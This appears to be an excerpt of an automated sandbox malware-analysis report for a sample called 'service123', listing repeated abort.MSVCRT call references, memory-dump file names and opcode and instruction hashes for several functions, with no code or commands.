abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D03
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D08
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D12
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D17
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D21
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D26
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D30
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D35
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D44
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: e5d33cdbb29950897f13e9ccef4405b5b9c7ae3dd775a108a504d7e7741a147c
Instruction ID: bfeec45909894907cc5c7cda202702ba241db46a32b6e5a502bb4dd52dca7ba4
Opcode Fuzzy Hash: e5d33cdbb29950897f13e9ccef4405b5b9c7ae3dd775a108a504d7e7741a147c
Instruction Fuzzy Hash: 6811E2B2642201CFE718EF1DE999F55B7B0FB61309F11AA58D584CBA11D738E818CBA0

Function 6C7629F0 Relevance: 42.1, APIs: 28, Instructions: 78COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C836CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D03
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D08
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D12
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D17
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D21
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D26
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D30
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D35
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D44
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 506bd7449b148874585a1a0549a7e4fb190e029856f67170337f6a02c0904c5e
Instruction ID: f9962ee303d7746f756f5713f3907d05188a08b5eaad8f3e6e5730b49da5fc46
Opcode Fuzzy Hash: 506bd7449b148874585a1a0549a7e4fb190e029856f67170337f6a02c0904c5e
Instruction Fuzzy Hash: 670128B2502201CFE714EF2DD589B55B7B0FB51309F11AE58C584CBA11D738E818CFA0

Function 6C7628BB Relevance: 42.1, APIs: 28, Instructions: 73COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C836CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D03
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D08
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D12
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D17
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D21
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D26
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D30
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D35
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D44
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 960415beba761d9b5cd5143c7e1a6a4a5114e6a4049012fb64f758b407805be9
Instruction ID: 98818d4f3a28068182f939a1d51e94c574a9aa3cfd2d679a1ed90d15ed8c3c5e
Opcode Fuzzy Hash: 960415beba761d9b5cd5143c7e1a6a4a5114e6a4049012fb64f758b407805be9
Instruction Fuzzy Hash: 4E0169B2542101CBE714EF1DD689B56B3B0FB52309F11AE58C4858BB01C739E818CFA0

Function 6C762A6E Relevance: 42.1, APIs: 28, Instructions: 71COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C836CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D03
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D08
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D12
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D17
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D21
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D26
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D30
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D35
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D44
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: ae7d595370836707b16ee98a5e938a035805ef9dbda9f74308273eb4bd95904e
Instruction ID: 3ec5c115fd620344ba1c098e8e2d82d92d44d82bc35c1290efd947ffa5278bea
Opcode Fuzzy Hash: ae7d595370836707b16ee98a5e938a035805ef9dbda9f74308273eb4bd95904e
Instruction Fuzzy Hash: 47013CB1546201CBDB14EF1DD699B55B7B0FB52309F11AE58C4449BB01C735E818CFD0

Function 6C762B13 Relevance: 42.1, APIs: 28, Instructions: 69COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C836CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D03
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D08
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D12
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D17
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D21
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D26
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D30
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D35
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D44
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: f7c039ed53276b3df1c7c197962dfa963c2862e3bb2d2a8fb2712851ac62e33a
Instruction ID: 3af9673de6359f05cee18795eac2031ccd885c4807719229542bc4cc0ea2902c
Opcode Fuzzy Hash: f7c039ed53276b3df1c7c197962dfa963c2862e3bb2d2a8fb2712851ac62e33a
Instruction Fuzzy Hash: 61F03CB1546205CBD714EF1DD698B55B7B0FB52309F11AE58C4449BA01C734E419CFD0

Function 6C7629B1 Relevance: 42.1, APIs: 28, Instructions: 67COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C836CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D03
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D08
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D12
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D17
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D21
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D26
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D30
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D35
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D44
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 5c058d1d1ad650ef2487ca3f5df54af25f8d9dc60ab0d71165c09ab13748d29a
Instruction ID: 2e5901fbfb443a58e11ce88b478513966969a9f01c6ca535625b380a5b8a1de4
Opcode Fuzzy Hash: 5c058d1d1ad650ef2487ca3f5df54af25f8d9dc60ab0d71165c09ab13748d29a
Instruction Fuzzy Hash: 83F049B1546201CBDB24EF59D298B66B7B0FB52308F12AE58C4049BA02D734E419CBD4

Function 6C762AAD Relevance: 42.1, APIs: 28, Instructions: 65COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C836CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D03
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D08
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D12
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D17
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D21
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D26
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D30
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D35
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D44
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 12514b1b25522da49a4cdcbefcb5234c819eb9fd91abde93bdbf23f8e9817ba4
Instruction ID: 150bca1c6974dcc87848251cf91abd21ee39e4eeb7b0e6d0455800380e21b249
Opcode Fuzzy Hash: 12514b1b25522da49a4cdcbefcb5234c819eb9fd91abde93bdbf23f8e9817ba4
Instruction Fuzzy Hash: 12F090B1446205CBDB24DF59C29876AB770FF52308F11AD58C4059BE02CB35E418CFD0

Function 6C76B930 Relevance: 40.6, APIs: 27, Instructions: 135COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D03
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D08
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D12
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D17
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D21
